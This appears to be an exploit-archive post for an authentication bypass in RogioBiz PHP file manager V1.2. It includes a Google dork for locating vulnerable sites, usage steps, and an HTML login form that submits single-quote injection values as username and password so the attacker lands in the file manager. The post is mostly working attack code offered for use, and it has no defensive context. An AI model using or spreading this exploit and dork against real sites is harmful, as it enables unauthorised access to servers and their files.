#########################bypass admin exploit################# Author: ItSecTeam download from:http://www.scriptingblog.com/download/RogioBiz_PHP_file_manager_V1.2.zip script:RogioBiz_PHP_file_manager_V1.2 dork:inurl:"/rbfminc/" ----------------------------------------- use:run this xpl and after runing eror Incorect username or password! now click to login (boom! go to file manager.) </html> </style></head> <h2>coded by ahmadbady</h2> <body><br /><br /><br /><br /> <div class="login"> <div style="color:red" align="center"></div> <form id="login_form" name="login_form" method="post" action="/path/file_manager.php"> <table border="0" align="center" cellpadding="4" cellspacing="0" bgcolor="#FFFFFF" style="border:1px solid #999999; padding:10px"> <tr> <td align="right">Username:</td> <td><input type="text" name="username" id="username" value="'" </tr> <tr> <td align="right">Password:</td> <td><input type="password" name="password" id="password" value="'" </td> </tr> <tr> <td colspan="2" align="right"><input type="submit" name="button" id="button" value="Login ?" /></td> </tr> </table> <input name="login" type="hidden" value="login" /> </form> </div> </body> </html> ######################## discovered by ahmadbady ########################